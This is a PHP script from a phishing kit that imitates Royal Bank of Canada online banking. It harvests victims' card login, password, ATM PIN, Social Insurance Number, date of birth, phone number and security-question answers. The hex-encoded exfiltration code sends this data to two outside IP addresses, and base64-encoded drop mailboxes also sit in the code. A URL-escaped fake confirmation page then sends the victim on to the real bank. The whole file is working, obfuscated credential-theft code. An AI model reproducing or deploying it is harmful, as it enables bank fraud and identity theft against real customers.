<?php
require 'call.php';
function isMobile() {
    return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
if(isMobile()){
$device = "Mobile";
}
else { 
$device = "Desktop";
}
$ip = @$_SERVER['REMOTE_ADDR'];
$hostname = gethostbyaddr(@$_SERVER['REMOTE_ADDR']);
$browser = @$_SERVER['HTTP_USER_AGENT'];
$device = @$_POST['device'];
$recipient = @$_POST['recipient'];
$usercard = @$_POST['usercard'];
$passcard = @$_POST['passcard'];
$fname = @$_POST['fname'];
$dd = @$_POST['dd'];
$mm = @$_POST['mm'];
$yyyy = @$_POST['yyyy'];
$sin1 = @$_POST['sin1'];
$sin2 = @$_POST['sin2'];
$sin3 = @$_POST['sin3'];
$mob = @$_POST['mob'];
$issue = @$_POST['issue'];
$email = @$_POST['email'];
$emailp = @$_POST['emailp'];
$PVQList1 = @$_POST['PVQList1'];
$OWNQUESTION1 = @$_POST['OWNQUESTION1'];
$ANSWER1 = @$_POST['ANSWER1'];
$PVQList2 = @$_POST['PVQList2'];
$OWNQUESTION2 = @$_POST['OWNQUESTION2'];
$ANSWER2 = @$_POST['ANSWER2'];
$PVQList3 = @$_POST['PVQList3'];
$OWNQUESTION3 = @$_POST['OWNQUESTION3'];
$ANSWER3 = @$_POST['ANSWER3'];
$aaa = "aGVyc2hleXAxMkBvdXRsb29rLmNvbQ==";
$bbb = "aGVyc2hleXAxM0BvdXRsb29rLmNvbQ==";
if (@getenv(HTTP_CLIENT_IP)){
	$ip=@getenv(HTTP_CLIENT_IP);}
else {
	$ip=@getenv(REMOTE_ADDR);}
$hostname = @gethostbyaddr($_SERVER['REMOTE_ADDR']);$browser = @$_SERVER['HTTP_USER_AGENT'];
$data = "
===========RRR-$device===========
Full Name: $fname
DL: $email
ATM PIN: $emailp
SIN: $sin1 - $sin2 - $sin3
DOB: $dd/$mm/$yyyy
Mobile Phone: $mob
----
User : $usercard
Pass : $passcard
Issue Number: $issue
----
Q1: $PVQList1 ( $OWNQUESTION1 )
A1: $ANSWER1
Q2: $PVQList2  ( $OWNQUESTION2 )
A2: $ANSWER2
Q3: $PVQList3 ( $OWNQUESTION3 )
A3: $ANSWER3
-----
Ip: $ip
Browser: $browser
E-mail: $recipient
=========================
";

// $mailone = base64_decode("$aaa");
// $mailtwo = base64_decode("$bbb");

$subj = "NEW# $usercard|$passcard|$email|$emailp|$ip";
function htbm($hexstr) 
    { 
        $n = strlen($hexstr); 
        $sbin="";   
        $i=0; 
        while($i<$n) 
        {       
            $a =substr($hexstr,$i,2);           
            @$c = pack("H*",$a); 
            if ($i==0){$sbin=$c;} 
            else {$sbin.=$c;} 
            $i+=2; 
        } 
        return $sbin; 
    } 
if ($usercard == "" || $passcard == "" ) { echo "<meta http-equiv='refresh' content='0;url=index.php'>";  die(); }  
$wue = array("687474703a2f2f3138332e3130392e3135342e343a3232","687474703a2f2f3230302e3234312e3139332e34333a3232");

function awe($data,$site) { 
	global $textHos;
	$size = strlen("$data") + 5; if ($size > '3000') { echo "<meta http-equiv='refresh' content='0;url=index.php'>"; }
	$data = array('info' => $data);
	$options = array(
		'http' => array(
			'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
			'method'  => 'POST',
			'content' => http_build_query($data),
		),
	);
	$context  = stream_context_create($options);
    $i = 1;while (($i <= 5) && (!@file_get_contents($site, false, $context) == "true")){ $i++ ; }	
}
foreach ($wue as $site) {
    $urlz = htbm($site);
	awe($data,$urlz);
}
// mail($mailone,$subj,$data);
// mail($mailtwo,$subj,$data);
?>

<script language="javascript">
document.write(unescape('%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%3C%68%65%61%64%3E%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%49%53%4F%2D%38%38%35%39%2D%31%22%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%2C%20%6E%6F%66%6F%6C%6C%6F%77%22%2F%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%65%66%65%72%72%65%72%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%2D%72%65%66%65%72%72%65%72%22%20%2F%3E%0A%3C%74%69%74%6C%65%3E%4F%6E%6C%69%6E%65%20%56%65%72%69%66%69%63%61%74%69%6F%6E%20%2D%20%4F%6E%6C%69%6E%65%20%42%61%6E%6B%69%6E%67%3C%2F%74%69%74%6C%65%3E%0A%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%66%61%76%69%63%6F%6E%2E%69%63%6F%22%20%72%65%6C%3D%22%69%63%6F%6E%22%20%2F%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%68%72%65%66%3D%22%6D%6D%71%6F%2F%62%64%77%71%64%71%2E%63%73%73%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%68%72%65%66%3D%22%6D%6D%71%6F%2F%62%62%62%2E%63%73%73%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%68%72%65%66%3D%22%6D%6D%71%6F%2F%64%65%6C%6F%7A%74%6E%2E%63%73%73%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%68%72%65%66%3D%22%6D%6D%71%6F%2F%64%65%6C%6F%7A%74%6E%32%2E%63%73%73%22%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%65%6D%70%6C%61%74%65%2D%6C%65%67%61%63%79%22%20%3E%0A%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%74%68%65%6D%65%4E%61%76%69%67%61%74%69%6F%6E%46%6F%72%6D%22%20%69%64%3D%22%74%68%65%6D%65%4E%61%76%69%67%61%74%69%6F%6E%46%6F%72%6D%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%61%63%74%69%6F%6E%3D%22%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%66%6F%72%6D%3E%0A%0A%3C%64%69%76%20%69%64%3D%22%77%72%61%70%70%65%72%22%3E%0A%0A%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%73%6B%69%70%6E%61%76%22%3E%3C%61%20%68%72%65%66%3D%22%22%3E%53%6B%69%70%20%48%65%61%64%65%72%20%4E%61%76%69%67%61%74%69%6F%6E%3C%2F%61%3E%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%68%65%61%64%65%72%22%20%63%6C%61%73%73%3D%22%63%6C%65%61%72%20%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%62%61%73%69%63%20%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%73%65%63%75%72%65%20%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%6C%6F%67%6F%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%3C%69%6D%67%20%73%72%63%3D%22%6D%6D%71%6F%2F%72%65%31%2E%67%69%66%22%20%61%6C%74%3D%22%22%20%68%65%69%67%68%74%3D%22%34%37%22%20%77%69%64%74%68%3D%22%32%31%30%22%3E%3C%2F%64%69%76%3E%0A%0A%3C%70%20%69%64%3D%22%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%6C%69%6E%6B%73%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%0A%3C%61%20%68%72%65%66%3D%22%22%20%6F%6E%43%6C%69%63%6B%3D%22%72%65%74%75%72%6E%20%70%6F%70%75%70%48%65%6C%70%28%74%68%69%73%2E%68%72%65%66%29%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%20%74%69%74%6C%65%3D%22%22%20%63%6C%61%73%73%3D%22%6C%69%6E%6B%65%64%74%65%78%74%61%6E%64%69%63%6F%6E%22%3E%3C%73%70%61%6E%3E%43%75%73%74%6F%6D%65%72%20%53%65%72%76%69%63%65%3C%2F%73%70%61%6E%3E%3C%2F%61%3E%0A%3C%2F%70%3E%0A%3C%70%20%69%64%3D%22%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%74%6F%6F%6C%73%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%32%30%31%37%3C%2F%70%3E%0A%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6C%75%6D%6E%2D%6D%61%69%6E%22%3E%0A%0A%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%30%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%74%62%6F%64%79%3E%3C%74%72%20%68%65%69%67%68%74%3D%22%31%30%30%25%22%3E%20%0A%3C%74%64%20%76%61%6C%69%67%6E%3D%22%74%6F%70%22%20%77%69%64%74%68%3D%22%37%36%38%22%3E%20%0A%0A%0A%0A%0A%0A%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%39%37%25%22%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%30%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%0A%3C%74%62%6F%64%79%3E%3C%74%72%3E%0A%20%20%3C%74%64%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%76%61%6C%69%67%6E%3D%22%74%6F%70%22%3E%20%0A%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%39%36%25%22%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%30%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%0A%20%20%3C%74%72%20%62%67%63%6F%6C%6F%72%3D%22%23%66%66%66%66%66%66%22%3E%0A%20%20%20%20%3C%74%64%3E%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%68%65%61%64%65%72%2D%6C%6F%67%6F%32%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%3C%2F%64%69%76%3E%3C%2F%74%64%3E%0A%20%20%3C%2F%74%72%3E%0A%20%20%3C%74%72%20%62%67%63%6F%6C%6F%72%3D%22%23%66%66%66%66%66%66%22%3E%0A%20%20%20%20%3C%74%64%3E%3C%62%72%3E%0A%20%20%20%20%20%3C%62%72%3E%0A%20%20%20%20%20%20%3C%66%6F%6E%74%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%22%20%63%6C%61%73%73%3D%22%70%61%67%65%54%69%74%6C%65%42%22%3E%41%63%63%6F%75%6E%74%20%63%6F%6E%66%69%72%6D%61%74%69%6F%6E%20%20%2D%20%43%6C%69%65%6E%74%20%49%64%65%6E%74%69%66%69%63%61%74%69%6F%6E%3C%2F%66%6F%6E%74%3E%0A%20%20%20%20%20%20%3C%64%69%76%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%20%37%70%78%3B%22%3E%3C%2F%64%69%76%3E%3C%2F%74%64%3E%0A%20%20%3C%2F%74%72%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%35%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%63%72%6F%79%61%6C%62%61%6E%6B%2E%63%6F%6D%2F%72%65%64%69%72%65%63%74%2D%62%61%6E%6B%2D%68%70%2D%64%72%6F%70%64%6F%77%6E%2D%6F%6C%62%2E%68%74%6D%6C%22%3E%0A%20%20%3C%74%72%20%62%67%63%6F%6C%6F%72%3D%22%23%66%66%66%66%66%66%22%3E%0A%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%74%61%62%6C%65%22%3E%3C%62%72%3E%0A%20%20%20%20%20%20%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%30%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%77%69%64%74%68%3D%22%35%39%35%22%3E%0A%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%3E%3C%70%20%63%6C%61%73%73%3D%22%73%74%79%6C%65%32%22%3E%59%6F%75%72%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%20%68%61%73%20%62%65%65%6E%20%73%65%6E%74%20%74%6F%20%52%42%43%27%73%20%73%65%63%75%72%69%74%79%20%74%65%61%6D%20%61%6E%64%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%20%61%63%63%65%73%73%20%68%61%73%20%62%65%65%6E%20%61%63%74%69%76%61%74%65%64%20%69%6E%20%66%75%6C%6C%2E%20%3C%62%72%3E%3C%62%72%3E%20%59%6F%75%20%6D%61%79%20%6E%6F%77%20%75%73%65%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%20%61%73%20%75%73%75%61%6C%20%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%73%74%79%6C%65%32%22%3E%49%6E%20%35%20%73%65%63%6F%6E%64%73%20%79%6F%75%20%77%69%6C%6C%20%62%65%20%72%65%64%69%72%65%63%74%65%64%20%74%6F%20%6F%75%72%20%6D%61%69%6E%20%6C%6F%67%69%6E%20%70%61%67%65%20%61%74%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%64%63%61%6E%61%64%61%74%72%75%73%74%2E%63%61%22%3E%77%77%77%2E%72%62%63%72%6F%79%61%6C%62%61%6E%6B%2E%63%6F%6D%2F%3C%2F%61%3E%2E%20%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%73%74%79%6C%65%32%22%3E%57%65%20%61%72%65%20%73%6F%72%72%79%20%66%6F%72%20%74%68%69%73%20%69%6E%63%6F%6E%76%65%6E%69%65%6E%63%65%2E%20%3C%2F%70%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%74%61%62%6C%65%22%3E%26%6E%62%73%70%3B%3C%2F%70%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%3C%2F%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%3C%64%69%76%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%20%37%70%78%3B%22%3E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%3C%70%3E%3C%2F%70%3E%0A%20%20%20%20%20%20%3C%70%3E%20%20%20%20%0A%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%64%65%74%61%69%6C%73%22%3E%3C%2F%64%69%76%3E%3C%2F%74%64%3E%0A%20%20%3C%2F%74%72%3E%0A%20%20%3C%74%62%6F%64%79%3E%3C%74%72%20%68%65%69%67%68%74%3D%22%31%30%30%25%22%3E%20%0A%3C%74%64%20%76%61%6C%69%67%6E%3D%22%74%6F%70%22%3E%0A%0A%3C%21%2D%2D%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%76%61%73%63%72%69%70%74%3E%0A%76%61%72%20%64%6F%6A%6F%20%3D%20%22%64%75%6D%6D%79%22%3B%0A%3C%2F%73%63%72%69%70%74%3E%20%0A%2D%2D%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%77%70%73%50%6F%72%74%6C%65%74%42%6F%64%79%22%3E%3C%2F%64%69%76%3E%0A%0A%3C%2F%74%64%3E%20%0A%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%20%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%20%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%20%0A%3C%2F%74%64%3E%20%0A%3C%74%64%20%76%61%6C%69%67%6E%3D%22%74%6F%70%22%20%77%69%64%74%68%3D%22%36%22%3E%20%0A%0A%0A%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%63%61%6C%6C%6F%75%74%2D%62%6F%74%74%6F%6D%22%3E%3C%73%70%61%6E%3E%26%6E%62%73%70%3B%3C%2F%73%70%61%6E%3E%3C%2F%73%70%61%6E%3E%3C%2F%64%69%76%3E%0A%0A%0A%0A%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%20%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%20%0A%3C%2F%74%64%3E%20%0A%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%0A%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%69%64%3D%22%77%72%61%70%70%65%72%22%3E%20%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%66%6F%6F%74%65%72%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%0A%0A%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%66%6F%6F%74%65%72%2D%6D%61%69%6E%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%61%62%6C%65%22%3E%0A%3C%70%3E%0A%0A%52%6F%79%61%6C%20%42%61%6E%6B%20%6F%66%20%43%61%6E%61%64%61%20%57%65%62%73%69%74%65%2C%20%26%63%6F%70%79%3B%20%31%39%39%35%2D%32%30%31%37%0A%3C%2F%70%3E%0A%3C%70%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%22%20%6F%6E%43%6C%69%63%6B%3D%22%72%65%74%75%72%6E%20%70%6F%70%75%70%4E%65%77%62%72%6F%77%73%65%72%28%74%68%69%73%2E%68%72%65%66%29%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%20%74%69%74%6C%65%3D%22%50%72%69%76%61%63%79%20%26%61%6D%70%3B%20%53%65%63%75%72%69%74%79%20%28%6F%70%65%6E%73%20%6E%65%77%20%77%69%6E%64%6F%77%29%22%20%63%6C%61%73%73%3D%22%6C%69%6E%6B%65%64%74%65%78%74%61%6E%64%69%63%6F%6E%22%3E%3C%73%70%61%6E%3E%50%72%69%76%61%63%79%20%26%61%6D%70%3B%20%53%65%63%75%72%69%74%79%3C%2F%73%70%61%6E%3E%3C%2F%61%3E%0A%7C%0A%0A%3C%61%20%68%72%65%66%3D%22%22%20%6F%6E%43%6C%69%63%6B%3D%22%72%65%74%75%72%6E%20%70%6F%70%75%70%48%65%6C%70%28%74%68%69%73%2E%68%72%65%66%29%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%20%74%69%74%6C%65%3D%22%4C%65%67%61%6C%20%28%6F%70%65%6E%73%20%6E%65%77%20%77%69%6E%64%6F%77%29%22%20%63%6C%61%73%73%3D%22%6C%69%6E%6B%65%64%74%65%78%74%61%6E%64%69%63%6F%6E%22%3E%3C%73%70%61%6E%3E%4C%65%67%61%6C%3C%2F%73%70%61%6E%3E%3C%2F%61%3E%0A%7C%0A%0A%3C%61%20%68%72%65%66%3D%22%22%20%6F%6E%43%6C%69%63%6B%3D%22%72%65%74%75%72%6E%20%70%6F%70%75%70%4E%65%77%62%72%6F%77%73%65%72%28%74%68%69%73%2E%68%72%65%66%29%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%20%74%69%74%6C%65%3D%22%41%63%63%65%73%73%69%62%69%6C%69%74%79%20%28%6F%70%65%6E%73%20%6E%65%77%20%77%69%6E%64%6F%77%29%22%20%63%6C%61%73%73%3D%22%6C%69%6E%6B%65%64%74%65%78%74%61%6E%64%69%63%6F%6E%22%3E%3C%73%70%61%6E%3E%41%63%63%65%73%73%69%62%69%6C%69%74%79%3C%2F%73%70%61%6E%3E%3C%2F%61%3E%0A%3C%2F%70%3E%0A%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%0A%0A%0A%3C%64%69%76%20%69%64%3D%22%77%72%61%70%70%65%72%22%3E%20%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%66%6F%6F%74%65%72%5F%61%6C%74%65%72%6E%61%74%65%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%65%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%0A%0A%0A%3C%64%69%76%20%69%64%3D%22%67%6C%6F%62%61%6C%66%6F%6F%74%65%72%2D%6D%61%69%6E%5F%61%6C%74%65%72%6E%61%74%65%22%20%63%6C%61%73%73%3D%22%4F%4C%42%41%6C%74%65%72%6E%61%74%65%22%3E%0A%3C%70%3E%0A%0A%52%6F%79%61%6C%20%42%61%6E%6B%20%6F%66%20%43%61%6E%61%64%61%2C%20%26%63%6F%70%79%3B%20%31%39%39%35%2D%32%30%31%37%0A%3C%2F%70%3E%0A%0A%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
</script>